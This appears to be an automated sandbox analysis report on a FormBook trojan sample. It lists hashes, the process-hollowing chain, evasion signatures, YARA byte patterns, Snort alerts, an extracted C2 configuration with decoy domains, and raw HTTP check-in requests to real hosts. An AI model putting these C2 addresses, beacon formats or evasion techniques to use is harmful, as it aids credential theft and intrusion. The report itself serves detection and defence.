Loading ...

Play interactive tourEdit tour

Windows Analysis Report 1D4l9eR0W4

Overview

General Information

Sample Name:1D4l9eR0W4 (renamed file extension from none to exe)
Analysis ID:532910
MD5:192b796d92d190c45204571599c38c86
SHA1:611559df5b74934dea4c81a5490e2c64a73ee6e0
SHA256:23c8bfea897f9833766ceab96299a77ad19ed1e0897b7e30d56d2c56c30d2d4e
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 1D4l9eR0W4.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\1D4l9eR0W4.exe" MD5: 192B796D92D190C45204571599C38C86)
    • 1D4l9eR0W4.exe (PID: 5548 cmdline: C:\Users\user\Desktop\1D4l9eR0W4.exe MD5: 192B796D92D190C45204571599C38C86)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5676 cmdline: /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.scion-go-getter.com/mwev/"], "decoy": ["9linefarms.com", "meadow-spring.com", "texascountrycharts.com", "chinatowndeliver.com", "grindsword.com", "thegurusigavebirthto.com", "rip-online.com", "lm-safe-keepingtoyof6.xyz", "plumbtechconsulting.com", "jgoerlach.com", "inbloomsolutions.com", "foxandmew.com", "tikomobile.store", "waybunch.com", "thepatriottutor.com", "qask.top", "pharmacylinked.com", "ishii-miona.com", "sugarandrocks.com", "anabolenpower.net", "my9m.com", "ywboxiong.xyz", "primetire.net", "yshxdys.com", "royallecleaning.com", "xtrategit.com", "almashrabia.net", "bundlezandco.com", "sandman.network", "vinhomes-grand-park.com", "jbarecipes.com", "squareleatherbox.net", "breathechurch.digital", "wodemcil.com", "carthy.foundation", "galimfish.com", "reflectbag.com", "lheteclase.quest", "yourvirtualevent.services", "custercountycritique.com", "liyahgadgets.com", "sweetascaramelllc.com", "lzgirlz.com", "flydubaime.com", "aanhanger-verhuur.com", "schooldiry.com", "theroadtorodriguez.com", "mrteez.club", "gxystgs.com", "runz.online", "kometbux.com", "mintyhelper.com", "bestinvest-4u.com", "bjxxc.com", "e-readertnpasumo5.xyz", "experimentwithoutlimits.com", "21yingyang.com", "recbi56ni.com", "tabulose-milfs-live.com", "uglyatoz.com", "websitessample.com", "gogopficg.xyz", "fourthandwhiteoak.com", "fulvousemollientplanet.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.1D4l9eR0W4.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.1D4l9eR0W4.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.1D4l9eR0W4.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        3.0.1D4l9eR0W4.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.1D4l9eR0W4.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 23 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.scion-go-getter.com/mwev/"], "decoy": ["9linefarms.com", "meadow-spring.com", "texascountrycharts.com", "chinatowndeliver.com", "grindsword.com", "thegurusigavebirthto.com", "rip-online.com", "lm-safe-keepingtoyof6.xyz", "plumbtechconsulting.com", "jgoerlach.com", "inbloomsolutions.com", "foxandmew.com", "tikomobile.store", "waybunch.com", "thepatriottutor.com", "qask.top", "pharmacylinked.com", "ishii-miona.com", "sugarandrocks.com", "anabolenpower.net", "my9m.com", "ywboxiong.xyz", "primetire.net", "yshxdys.com", "royallecleaning.com", "xtrategit.com", "almashrabia.net", "bundlezandco.com", "sandman.network", "vinhomes-grand-park.com", "jbarecipes.com", "squareleatherbox.net", "breathechurch.digital", "wodemcil.com", "carthy.foundation", "galimfish.com", "reflectbag.com", "lheteclase.quest", "yourvirtualevent.services", "custercountycritique.com", "liyahgadgets.com", "sweetascaramelllc.com", "lzgirlz.com", "flydubaime.com", "aanhanger-verhuur.com", "schooldiry.com", "theroadtorodriguez.com", "mrteez.club", "gxystgs.com", "runz.online", "kometbux.com", "mintyhelper.com", "bestinvest-4u.com", "bjxxc.com", "e-readertnpasumo5.xyz", "experimentwithoutlimits.com", "21yingyang.com", "recbi56ni.com", "tabulose-milfs-live.com", "uglyatoz.com", "websitessample.com", "gogopficg.xyz", "fourthandwhiteoak.com", "fulvousemollientplanet.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 1D4l9eR0W4.exeVirustotal: Detection: 25%Perma Link
          Source: 1D4l9eR0W4.exeReversingLabs: Detection: 24%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY
          Source: 3.0.1D4l9eR0W4.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.1D4l9eR0W4.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.1D4l9eR0W4.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.1D4l9eR0W4.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1D4l9eR0W4.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 1D4l9eR0W4.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 1D4l9eR0W4.exe, 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 1D4l9eR0W4.exe, 1D4l9eR0W4.exe, 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmp, wlanext.exe, wlanext.exe, 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdb source: 1D4l9eR0W4.exe, 00000003.00000002.714332060.0000000001BB0000.00000040.00020000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 1D4l9eR0W4.exe, 00000003.00000002.714332060.0000000001BB0000.00000040.00020000.sdmp

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49816 -> 147.255.129.44:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49816 -> 147.255.129.44:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49816 -> 147.255.129.44:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49834 -> 15.197.142.173:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49834 -> 15.197.142.173:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49834 -> 15.197.142.173:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49909 -> 43.132.183.85:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49909 -> 43.132.183.85:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49909 -> 43.132.183.85:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 147.255.129.44 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.143.147.58 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.203.115 80
          Source: C:\Windows\explorer.exeNetwork Connect: 43.132.183.85 80
          Source: C:\Windows\explorer.exeDomain query: www.fulvousemollientplanet.com
          Source: C:\Windows\explorer.exeDomain query: www.rip-online.com
          Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80
          Source: C:\Windows\explorer.exeNetwork Connect: 87.236.16.208 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.scion-go-getter.com
          Source: C:\Windows\explorer.exeDomain query: www.sandman.network
          Source: C:\Windows\explorer.exeDomain query: www.foxandmew.com
          Source: C:\Windows\explorer.exeDomain query: www.royallecleaning.com
          Source: C:\Windows\explorer.exeDomain query: www.websitessample.com
          Source: C:\Windows\explorer.exeDomain query: www.experimentwithoutlimits.com
          Source: C:\Windows\explorer.exeDomain query: www.21yingyang.com
          Source: C:\Windows\explorer.exeDomain query: www.9linefarms.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.209.150.94 80
          Source: C:\Windows\explorer.exeDomain query: www.tikomobile.store
          Source: C:\Windows\explorer.exeDomain query: www.texascountrycharts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.164.242.49 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.scion-go-getter.com/mwev/
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-LAX-11US LEASEWEB-USA-LAX-11US
          Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=HsmrIALTvXRwIzSnf5nMI/V00TunQUINtH1bLOqGnVursL/6Yec02BWx+TEJbBuPuFeE&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.royallecleaning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=Y+Hyy1N7e+ROxQ1BzGerXtl/+e9k+2VYdpmZeNGMnmnYwBGoq47Ntyx8TFdOC4/xH+hS&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.scion-go-getter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=iTGszEHgBfgYRglEf8qTe/0GehEi8eYY5QDShU32F6t0wDyeZFMPJI0cijyvgJ5fvuvy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.21yingyang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=muoWufO8p6lksAUPj07m8fqHwDrNKoj9M2hBle0NDwQN4kTZYCe/nJ8SwFL4fqBvjDWp&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.texascountrycharts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=/zd6oxG+H6qci+O+cHlZDp/zFP0nYcFn0YDhkjhJJtSXAtrcRYu0trJUidLUZZla0YBM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.tikomobile.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=vthKUgsgoRJ92n81Fuh07g/ARRJh8nN5iXUIpLSVgoOHRdB6AKBPErPncdrss3E6nFAH&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.fulvousemollientplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=wD7IX5djK39N0mXOoKckCLddnCt/+mP/xVLK1b09pQyAIyzBpLPKZ8m7O34kMZ4xQV6J&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.experimentwithoutlimits.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRpjh/yF5dNln&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.websitessample.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.foxandmew.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=IjrmxmCSNg9SW3Y0DfjHEVuIkvJ5tkiLJE48G3emnLXjviiyyOAbNkhdp+PdSxIUf+MM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.9linefarms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/pECdGagYy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.rip-online.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 43.132.183.85 43.132.183.85
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:00:13 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be73d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Nginx Microsoft-HTTPAPI/2.0X-Powered-By: NginxDate: Thu, 02 Dec 2021 19:00:25 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Thu, 02 Dec 2021 19:00:35 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 02 Dec 2021 19:00:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 287Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 77 65 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 69 6b 6f 6d 6f 62 69 6c 65 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mwev/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.tikomobile.store Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 19:00:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: -1X-Dc: gcp-europe-west1X-Request-ID: 1172709a-00f8-4954-b923-2ab5922ac1c1X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6b76cccebf534ebc-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 